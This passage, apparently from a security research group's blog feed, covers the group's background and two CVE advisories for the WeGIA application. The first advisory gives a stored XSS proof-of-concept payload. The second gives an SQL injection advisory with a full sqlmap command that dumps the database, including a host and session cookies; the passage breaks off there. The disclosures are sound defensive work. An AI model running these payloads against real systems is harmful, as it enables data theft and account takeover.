    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DNS override:&amp;lt;/b&amp;gt; Provides fine-grained control of domain name resolution during security testing to enable pentesters to spoof DNS, redirect traffic, and create realistic test cases. It is necessary to verify DNS-related vulnerabilities, perform phishing attacks, and analyze complex network attack vectors.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Browser integration:&amp;lt;/b&amp;gt; Facilitates instantaneous inspection and dynamic inspection of HTTP/HTTPS traffic from modern web browsers, including those with strong reliance on JavaScript and dynamic content loading. The integration improves the efficiency of testing highly interactive web applications, single-page applications (SPA), and rich-client environments, which permit cross-site scripting (XSS), authentication problems, and other client-side attack detection.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;about-the-cve-hunters-group-formation-evolution-and-mission&amp;#34;&amp;gt;About the CVE-Hunters Group: Formation, Evolution and Mission
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/repo.png&amp;#34;
	width=&amp;#34;674&amp;#34;
	height=&amp;#34;848&amp;#34;
	srcset=&amp;#34;/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/repo_hu_1766647e601cd925.png 480w, /articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/repo_hu_70e520e1660c3d3e.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;79&amp;#34;
		data-flex-basis=&amp;#34;190px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;CVE-Hunters is a dedicated information security research group specializing in the discovery, analysis, and responsible disclosure of vulnerabilities in critical software applications. Founded in December 2024 by cybersecurity expert Professor &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34; &amp;gt;Natan Morette&amp;lt;/a&amp;gt;, the group started with just four passionate students eager to deepen their knowledge in offensive security and ethical hacking.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Under the expert technical and ethical mentorship of Professor &amp;lt;a href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;&amp;gt;Natan&amp;lt;/a&amp;gt;, CVE-Hunters has steadily grown and matured. Today, we proudly count 10 active cybersecurity researchers who apply practical skills learned in both academic settings and hands-on lab environments. Our core focus areas include penetration testing, vulnerability assessment, CVE publication, and contributing to the security hardening of impactful open-source projects with significant social relevance.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Our research and development work is continuously evolving. We are actively analyzing new security flaws, documenting technical details, and preparing additional responsible vulnerability disclosures to the community.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;To learn more about our team members, explore our ongoing projects, and follow the latest CVE publications, visit our official GitHub repository at: &amp;lt;a href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;&amp;gt;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;lt;/a&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;All identified vulnerabilities and officially published CVEs by CVE-Hunters are transparently catalogued and accessible on our official website: &amp;lt;a href=&amp;#34;https://sec-dojo-cyber-house.github.io/&amp;#34;&amp;gt;https://sec-dojo-cyber-house.github.io/&amp;lt;/a&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: center;&amp;#34;&amp;gt;“Security is a journey, not a destination.” &amp;lt;br /&amp;gt;
  &amp;lt;a href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House&amp;#34;&amp;gt;&amp;lt;img src=&amp;#34;sdch.png&amp;#34; width=&amp;#34;120&amp;#34;/ /&amp;gt;&amp;lt;/a&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;written-by&amp;#34;&amp;gt;Written by
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 04 Jun 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-30366</title>
        <link>https://www.cvehunters.com/p/cve-2025-30366/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-30366/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-30366-multiples-stored-xss-in-personalizacaophp&amp;#34;&amp;gt;CVE-2025-30366: Multiples Stored XSS in &amp;lt;code&amp;gt;personalizacao.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-30366&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-30366&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples stored Cross-Site Scripting (XSS) vulnerability was identified in the WeGIA application. This vulnerability allows unauthorized scripts to be executed within the user&amp;#39;s browser context. Stored XSS is particularly critical, as the malicious code is permanently stored on the server and executed whenever a compromised page is loaded, affecting all users accessing this page.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;html/personalizacao.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-30366-multiples-stored-xss-in-personalizacaophp&amp;#34;&amp;gt;CVE-2025-30366: Multiples Stored XSS in &amp;lt;code&amp;gt;personalizacao.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-30366&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-30366&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples stored Cross-Site Scripting (XSS) vulnerability was identified in the WeGIA application. This vulnerability allows unauthorized scripts to be executed within the user&amp;#39;s browser context. Stored XSS is particularly critical, as the malicious code is permanently stored on the server and executed whenever a compromised page is loaded, affecting all users accessing this page.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;html/personalizacao.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;Titulo&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Subtitulo&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Conheça&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Objetivo&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;Rodape&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;To reproduce the issue, insert the following payloads into the vulnerable field of the URL and save the changes:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;Alert: XSS&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;);&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;After saving the input, the injected script will be stored on the server and automatically executed for any user accessing the &amp;lt;code&amp;gt;home page&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;personalizacao.php&amp;lt;/code&amp;gt;, confirming the stored XSS.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;File: &amp;lt;code&amp;gt;html/personalizacao.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Payload:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;Alert: XSS&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;);&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;Trigger in: &amp;lt;code&amp;gt;Home Page&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;personalizacao.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;titulo&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;subtitulo&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;conheça&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;objetivo&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;rodape&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-30366/393505214-e93ca486-9bbf-47bd-a2df-76daeac5924d.png&amp;#34;
	width=&amp;#34;1126&amp;#34;
	height=&amp;#34;342&amp;#34;
	srcset=&amp;#34;/p/cve-2025-30366/393505214-e93ca486-9bbf-47bd-a2df-76daeac5924d_hu_313be0c57ac23705.png 480w, /p/cve-2025-30366/393505214-e93ca486-9bbf-47bd-a2df-76daeac5924d_hu_ade2770e134cbf73.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;329&amp;#34;
		data-flex-basis=&amp;#34;790px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
All users accessing the affected pages (&amp;lt;code&amp;gt;home page&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;personalizacao.php&amp;lt;/code&amp;gt;), as the malicious script is stored on the server and executed automatically in their browsers. &amp;lt;/br&amp;gt;
&amp;lt;p&amp;gt;Administrators who interact with the vulnerable fields may also be affected, potentially leading to account takeover if sensitive cookies or session tokens are stolen.&amp;lt;/br&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;The application itself, as attackers can use XSS to deface content, redirect users, or perform actions on behalf of authenticated users.&amp;lt;/p&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-pwr9-fr8r-8h48&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-pwr9-fr8r-8h48&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reporter&amp;#34;&amp;gt;Reporter
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 27 Mar 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-30367</title>
        <link>https://www.cvehunters.com/p/cve-2025-30367/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-30367/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-30367-sql-injection-endpoint-controlphp-parameter-nextpage&amp;#34;&amp;gt;CVE-2025-30367: SQL Injection endpoint &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-30367&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-30367&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was identified in the WeGIA application, specifically in the &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; endpoint. This vulnerability allows attackers to execute arbitrary SQL commands in the database, allowing unauthorized access to sensitive information. During the exploit, it was possible to perform a complete dump of the application&amp;#39;s database, highlighting the severity of the flaw.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;WeGIA/controle/control.php?metodo=listarUm&amp;amp;amp;nomeClasse=SaudeControle&amp;amp;amp;nextPage=&amp;amp;lt;payload&amp;amp;gt;&amp;amp;amp;id=1&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-30367-sql-injection-endpoint-controlphp-parameter-nextpage&amp;#34;&amp;gt;CVE-2025-30367: SQL Injection endpoint &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-30367&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-30367&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was identified in the WeGIA application, specifically in the &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; endpoint. This vulnerability allows attackers to execute arbitrary SQL commands in the database, allowing unauthorized access to sensitive information. During the exploit, it was possible to perform a complete dump of the application&amp;#39;s database, highlighting the severity of the flaw.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;WeGIA/controle/control.php?metodo=listarUm&amp;amp;amp;nomeClasse=SaudeControle&amp;amp;amp;nextPage=&amp;amp;lt;payload&amp;amp;gt;&amp;amp;amp;id=1&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;nextPage&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application does not perform proper validation or sanitization on the id parameter, allowing an attacker to manipulate SQL queries directly. This flaw makes it possible to execute malicious statements in the database. During testing, the extraction of sensitive data through the exploit was confirmed.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload-sqlmap&amp;#34;&amp;gt;Payload (sqlmap):
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  sqlmap -u &amp;amp;#34;https://comfirewall.wegia.org:8000/WeGIA/controle/control.php?metodo=listarUm&amp;amp;amp;nomeClasse=SaudeControle&amp;amp;amp;nextPage=../html/saude/profile_paciente.php?id_fichamedica=1&amp;amp;amp;id=1&amp;amp;#34; --dbms=mysql --cookie=&amp;amp;#34;_ga_F8DXBXLV8J=GS1.1.1733782455.11.1.1733782568.60.0.0; _ga=GA1.1.552051356.1730893405; PHPSESSID=tc79og6t5lr33d4tjv7ct1o9pg&amp;amp;#34; --dump
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-30367/394311504-0df8a936-c559-42e6-806d-3c9982dfede1.png&amp;#34;
	width=&amp;#34;1900&amp;#34;
	height=&amp;#34;320&amp;#34;
	srcset=&amp;#34;/p/cve-2025-30367/394311504-0df8a936-c559-42e6-806d-3c9982dfede1_hu_bc742d5220a6ae14.png 480w, /p/cve-2025-30367/394311504-0df8a936-c559-42e6-806d-3c9982dfede1_hu_9af90e89d0280d81.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;593&amp;#34;
		data-flex-basis=&amp;#34;1425px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Using sqlmap an attacker could dump the entire database information from WeGIA.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Database: wegia&amp;lt;/br&amp;gt;
Table: funcionario_docfuncional&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-30367/394312112-9469b854-ee27-45f6-b6fc-01b15ef66e1c.png&amp;#34;
	width=&amp;#34;647&amp;#34;
	height=&amp;#34;342&amp;#34;
	srcset=&amp;#34;/p/cve-2025-30367/394312112-9469b854-ee27-45f6-b6fc-01b15ef66e1c_hu_6117a52c8b556d2f.png 480w, /p/cve-2025-30367/394312112-9469b854-ee27-45f6-b6fc-01b15ef66e1c_hu_ea29f296d0926c04.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
